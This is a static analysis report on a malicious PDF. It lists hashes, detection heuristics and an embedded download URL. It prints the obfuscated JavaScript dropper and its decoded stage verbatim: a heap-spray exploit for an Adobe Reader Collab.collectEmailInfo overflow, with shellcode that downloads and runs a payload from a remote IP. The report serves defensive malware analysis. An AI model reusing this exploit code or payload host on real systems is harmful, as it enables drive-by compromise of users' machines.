Malicious PDF — malware analysis report

Static analysis result for SHA-256 c4c1fc893a8a738e…

MALICIOUS

PDF

4.6 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 590120765b3b71fb97d64050f8f73f5d SHA-1: 57f2e5da8a3b9baaf245bb9899602a7f34c195b8 SHA-256: c4c1fc893a8a738ee7784be85e1f5342a3336039bd4cf8e59d00064c44c01ec9
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.007 JavaScript

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), which is often employed to de-obfuscate and execute malicious code. The extracted JavaScript artifact, javascript_obj0013_001.js, also shows signs of script obfuscation. The primary attack pattern involves leveraging JavaScript within a PDF to execute arbitrary code, likely to download and run a secondary payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function EXFNSLQfxNc3(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function X926brl(LxvZHpCOs1Lqqo){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(LxvZHpCOs1Lqqo)"+";"+"}");eval("function pUddPAHwHF(qZts9hY){var XwyqTNJD6RFmi="+"0,jnAXKmv=qZts9hY.l"+"en"+"gth,FN2GwVuZv5rrM=10"+"2"+"4,qegYWpF5eSs,WCbvt,jvhFQbpL='',PC3nrgTQDJg=XwyqTNJD6RFmi,g9Am9NO4GoNCWc=XwyqTNJD6RFmi,rRyn9A=XwyqTNJD6RFmi,d3WPSji93gHCSP=Ar" …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://91.203.92.136/spl2/load.php?id=282&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36A 6464 bytes
SHA-256: a42ad667d28d7a191adedeb9293b5441510ce5d5eaa2669e58a44dcb7cf31b24
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 196 of 243 identifiers look randomly generated (e.g. 'RVKRKVvPqvCPKVvPqVNTC3vPqTLVsvvPqTKVd3vP'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function EXFNSLQfxNc3(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function X926brl(LxvZHpCOs1Lqqo){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(LxvZHpCOs1Lqqo)"+";"+"}");eval("function pUddPAHwHF(qZts9hY){var XwyqTNJD6RFmi="+"0,jnAXKmv=qZts9hY.l"+"en"+"gth,FN2GwVuZv5rrM=10"+"2"+"4,qegYWpF5eSs,WCbvt,jvhFQbpL='',PC3nrgTQDJg=XwyqTNJD6RFmi,g9Am9NO4GoNCWc=XwyqTNJD6RFmi,rRyn9A=XwyqTNJD6RFmi,d3WPSji93gHCSP=Ar"+"ra"+"y(63,31,40,13,8,43,55,2,34,18,0,0,0,0,0,0,7,49,14,3,59,19,28,29,9,10,56,51,52,27,6,42,1,46,0,37,17,45,12,23,39,22,47,0,0,0,0,4,0,44,25,53,36,58,24,30,41,54,57,11,33,5,32,61,21,48,26,20,60,38,16,15,62,50,35);f"+"o"+"r(WCbvt=M"+"at"+"h.c"+"ei"+"l(jnAXKmv/"+"FN2GwVuZv5rrM)"+";WCbvt>XwyqTNJD6RFmi;WCbvt-"+"-){fo"+"r(qegYWpF5eSs=Ma"+"th.m"+"in(jnAXKmv,FN2GwVuZv5rrM);qegYWpF5eSs>XwyqTNJD6RFmi;qegYWpF5eSs-"+"-,jnAXKmv-"+"-){rRyn9A|"+"=(d3WPSji93gHCSP[qZts9hY.cha"+"rCod"+"eAt(PC3nrgTQDJg+"+"+)-48])<"+"<g9Am9NO4GoNCWc;if(g9Am9NO4GoNCWc){jvhFQbpL+"+"=X926brl"+"(117^rRyn9A&"+"2"+"5"+"5);rRyn9A>"+">="+"8;g9Am9NO4GoNCWc-"+"="+"2;}el"+"se{g9Am9NO4GoNCWc="+"6"+";}}"+"}return (jvhFQbpL);}var CTqfq3CSfJud8=implode('',['p3Rm@spk','wv7','Resm','9','pU','P','_','7sm3','@','FRmV','Lm','WBpc_Ralm','PqlNM','sm','V1','VC','R','1f','PP8LlHGTz3Y_ykRhTYpPRNDn','zNlfyNPnK3jqpp','BsSR','GqTNvspWLf','zmlt7v','rapN','va','l_PL','AW@S_','RfaCB','r_8HM_','RB6dC','WBvz3Y','_ykR','hTpglspLf','zmlt7vrJ_7pTz3','Y_ykR','hTp4pm3ifT4ZRdNMbR','R','WfvR@q','AN9LpTbP','RNDnzNl','fyNPnK3','j2cTFjsp@RTR','RFq','NpTz','3Y_','y','kRhlEplvpERqNY_','R@raTpR','vANv_','C_LVv','EyqLwNf','TW','FpSCp3Rm@','sm','3XRv@','AqE','v@SA4mV','lP@pm','9','ppsCm','bTTYsdmmblE','p3Rm','@sp','@7F','Aks2TV','bJlw','@bvp4','pmRMRl','PYv','TPvLcpvPvv','NmdTvPvvNmdT','vPv','vNmd','TvPvTKRK3vPn','TNPL3vP','qvCbCE','vPvEmGCEvPvE','mp_','T','vPRVKfdTvPRV','@','m','dTvPRV6VC3vPRV3p','_v','vPqV','K','Rz','3vPqV','KVKVvPvE','64LVv','PvVK__VvPR','VKRK','VvPqvPPKVvPRVN','TKVvP','REKV','sv','vPvv@3zTvPREKVsvvPqvq','R','z','v','vPRV','KsdTv','P','RVKR','K3v','PqvPPK','VvPq3V','pdTvPqv_cdvvPRV','_TC','TvPvT7pdTvPRV','Kv_TvPRVKRKVvPR3L','VLvvPq3VP','K3vPnv','7cdvvPqv','R','T_TvPvT7','PCTvPRVKv','LVvPRVKRK','V','v','PR3LVL','vvPq3VP','zvvPn3LLdv','vPRTmPLVvPvT7GsVvPRVKssVvPRV','KRKVvP','R3L','VLvvPq3VPzTvPvTmcd','vvPvTKF_TvPvT7cLVvPRV','KfL3vPRVK','RKVvPR3L','VLvvPq','3V3KV','v','PqTqLdvvPvTLq','L','vvPvT7PdvvPRV','KF_Ev','PRVKR','KVvPR3LV','LvvPR3KVK3vPvV73LV','vPRELFd','3vP','qvCT_vvPqV7TC3vPRV3pL','vvPRVKRC','VvP','q','3_P','KVvP','RELVLvvP','qvP','bK3vPRV6vC','3vPRVqL_vvP','q','vP','GKvvPqV','7GC','3vPvT','7GCEvPRVK','Vsv','vP','RVKRKVv','PvE7GKVvPqV','RmCEvPR','EKf','ET','vPnv3pdvv','P','RVKRKVvPqvCPKVvPqVNTC3vPqTLVsvvPqTKVd3vPqvCGK','VvPn3Kv','C3vPRTmc','dvvPRV','KRKVv','P','q','3KRKVv','PR3LVsvvPvER','3K3vP','q','3CPEVv','Pq3L','Vsvv','PvT','7','3zv','vPR','VKL_Vv','PR','VKRKVvPR3L','Rz3vPqT3bKVv','Pq3NP','KV','vPn','3_A_T','vPq','T3c_3vPRV6v','KVv','PvE','Lqdv','vPR','VKR','KVvPRELvsTvPqvPbKV','vPRVNT','C3','v','PRV','qL','_vvPqvP','GKvvPqV7','GC3vPR','3Ksdv','vP','RVKRK','Vv','PvER','PKVvPq37PEEvPR3LRz3vP','vV','if','K3vPq3ifsvvP','R','TmGz3v','Pn3Kq_3','vPq3iF','KVv','PR3','LVsvv','Pv','E','R3','zTvPq3CP','C3vP','q3','LVs','vvPvT73zvvPRVK','fz3vP','RVKRKV','vPRVKL_','v','vP','R','E','Lvs','Tv','PqvPb','KVvPRV7TC3vPRVAL_','v','v','Pqv','PGKvvPqV','7G','C3vPqVKsdv','vPR','VKRKVvPv','ERPKV','vPqvPTsTvPqVKvC3','v','PRVqL_vvP','qvP','GK','vvPqV7','GC3','vPRVKsdvvPRV','KRKVvP','R','3q','RKV','v','Pq3AFEvv','PvTqR','z','3vPvTqRz3','vP','v','T','qR','z3vP','vTqRz3vPvTN3d3vPq3RPK3vPqvPG','z3vPvT','Af_v','v','Pq3A','vsE','vP','vTKvsTvPqvPGC3','vPqvPpdT','vPRV','7ALTv','Pq3@3svvP','q3VPz','TvPREiVs','vvPqvPm','zTv','P','qV','_','AL','3vP','RV','iqdvvPq3V','T','d3vPREV3svvPRVifK','Vv','Pv','Vivd3v','PR3CGL','vvPvv@T','C','Vv','PqTiRz3vP','vVi','FCEvPRVmT_EvPqVKR_','TvPRTA_','CvvPR','V7AL','3vPqT_G_VvPRViR','KT','vPR3Kv','sVvPRTqss','vvPRT_mEvvP','RELFCTvPq3Rp_','3vPvTP3s','vvPq3R3svv','PR','Vi','f','K3vPvE','VbL','TvPRVN3svvP','qvP','TEvvPq','VNGCvvPn','T@Pz3vP','RV6','Vsv','vPR','V','iVsvvPq3_G_3vP','qTAFKTv','PRVKRzvvPRT','6','sdvvPRTmT_TvPq3LvsTvPR3','NGEVvPR3mTK','T','vPRVK','vCTvPnvP','3sEvPn','vmH','s','vvP','qTKf_3vPnTVGLV','vPq','T','qf_T','vP','nTmbLTv','Pq','T','qf','dTvPnT@b_','EvPnT_','G_VvPnTCbdTv','PnvNGLVvPqv','i4sTvPqT','KfLT','vPq','vK','Vd3vPqvP3_TvPnvmG_VvPn','vm3','sE','vP','qvVbLVv','PnTAVs','vv','P','nT3','bLTvPqTCbLTvPnvmHdTvP','nTAVd3vP','vTmbsvWA','SEp3Rm','@s','S','N','NTC','NVsm9ppsCPpsTmpsTBpcRsF','v','pjq7','m','Z','Jzw','R','dEp4pp@7FA','ks','2T','VbJlw@b','qY','bRAN9_v','@po','p','p@jspCvAPp','PRNDnzNlf','yN','PnK','3jsm','9phlTLnPCpl','ppGS','Cks','t8wxRvB','gp','sCNc','_','WBpc','R','sFvpLfzmlt7','vrsm9','pPqNvfnmssR_GGmsRqsTVp_sRqsT','VpLpFjspLfz','mlt','7','vrs','m9pPK@KRq','@Yvn4Gf','9WL','fzmlt','7v','rdpp','RnABJ2T','4uaTRJFE','BFj','spCvAPphKV1','4dv','9qy_','_qEp4ppW','LF7RG_CwPGs','Nz','sq','_NFspfpp','T3_sTmpsTm','AS','Y','rf_3fqnEp3lN@sp','W','C','vA','P','pA','K4UFnRuq73gfl3zqLT4','pd','EtV9','k@4n','Hav','z@Y','fK','4VGs9eV','K@7Hd_aVPPtJ_wzLyP','7f7kLJlmiV','7','E@jSWFpSCpcyCdRn','B','Q','qK4U','F','nRuq73gfl3','zqL','T2sm9','pT','z3Y_ykRh','T','pgp','p@7FAks2TVb','Jlw@bnEp','lv','p4sc_','R','al','mP','qlN','Ms','c4rs7vVLmWpjvpC','vAPpcT','T6VLRUsm9pT','TPmacRFRlR','v','Fq4vFnPF2ANMmnNu_qPFa','l_GASEpc','TT','6VLR','Us','m9','pcTT6VLRU','acPv','s','vNsfP_GhpIA2S_bGcpFj','spCv','APp','ol','vVFRT','0VLk','Z2Tp4pcNv4vpLF','qPsqvWGsL','3C3v','kM','bT@','sF','R3','PLpTFSp@mGKvCLy','YYLPm@v','ERGT_WbcT','T6VLRUaS','m','GvAPL_v','W@A','mW','Bpm@EspWGolvVFRT0V','LkZ','2lk','ml9','p4','lsp3pcs','E','ppWGolvVFRT0VLk','Z2lk_l9p4ls','p','_pcsE','pc@7A','qP_','o','Kv','Zt8NQ','F','_IpSsp@AppHdvp14_C@','v','LwCoykrJ7T2sp9pT','_','WFpp7HspW14_C@vLw','Coy','krJ9T2sm94pSvp3','c','spo','lvVFRT0VLkZ','2lk','_l9pHpmTFp','p7HspW1','4_','C','@vLwCoykrJ9T2s','p9pH_WF','p','SCp','PRmMRTVvvKR3','HCE0fnmG','ASEp3Rm@','scHnREBjL8','m','DdKTusm9','pPqNvfnmssR','_GGmsRsdmmbPsRs','dmmbApFjs','p7LP@bRTWXR7VjdEkY','aEB@','byYbRAN','9_v@','pSs','pPm','_ERG_WpG74qdEBUfABjFdHpjm','9pG74qdEBU','fABjFdHBpp','R','G','q','l','PMb','lNbdPmWf','9Rr','FR_plspi2TNbv','AmMb','lNbdP_Y_RVfv','P@bqKN','E2TWBf','RR','WtAEpGcpbllP9ts','p','XR7VjdEk','Ya','EB','@b77F','jsp4s','m7p38NSR','_CGASE']);");eval(pUddPAHwHF(CTqfq3CSfJud8));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x36A 2586 bytes
SHA-256: c63739bd308f64f7e3e787886b17635447c05e220aec681c01342e8fb1c14531
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var XzQuO = new Array(); function EjFujcqWhS(ACcTZ5o, umNMoTSntMBL) { while (ACcTZ5o.length*2<umNMoTSntMBL){ACcTZ5o += ACcTZ5o;} ACcTZ5o = ACcTZ5o.substring(0,umNMoTSntMBL/2); return ACcTZ5o; } function uaneDeAv8G9Jsc() { var ARuhDI42lVpfs2 = 0x0c0c0c0c; var hwbZaoDlkK2s = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u392F%u2E31%u3032%u2E33%u3239%u312E%u3633%u732F%u6C70%u2F32%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3832%u2632%u7073%u3D6C%u0034"); var o3Amy = 0x400000; var LYaZKKuL = hwbZaoDlkK2s.length * 2; var umNMoTSntMBL = o3Amy - (LYaZKKuL+0x38); var ACcTZ5o = unescape("%u9090%u9090"); ACcTZ5o = EjFujcqWhS(ACcTZ5o, umNMoTSntMBL); var OFj77gYfqI = (ARuhDI42lVpfs2 - 0x400000)/o3Amy; for (var IVXrwSYAkcCV92=0;IVXrwSYAkcCV92<OFj77gYfqI;IVXrwSYAkcCV92++) { XzQuO[IVXrwSYAkcCV92] = ACcTZ5o + hwbZaoDlkK2s; } } function VoP5y() { var h0B6vX = app.viewerVersion.toString(); h0B6vX = h0B6vX.replace(/\D/g,""); var j7yr1J6ZZo = new Array(h0B6vX.charAt(0),h0B6vX.charAt(1),h0B6vX.charAt(2)); if ((j7yr1J6ZZo[0] == 8 && ((j7yr1J6ZZo[1] == 1 && j7yr1J6ZZo[2] < 2) || j7yr1J6ZZo[1] < 1)) || (j7yr1J6ZZo[0] == 7 && j7yr1J6ZZo[1] < 1) || (j7yr1J6ZZo[0] < 7)) { uaneDeAv8G9Jsc(); var RUELLXcNL2S = unescape("%u0c0c%u0c0c"); while(RUELLXcNL2S.length < 44952) RUELLXcNL2S += RUELLXcNL2S; this.collabStore = Collab.collectEmailInfo({subj: "",msg: RUELLXcNL2S}); } } VoP5y();

Open this report in the interactive analyzer, or submit your own file for analysis.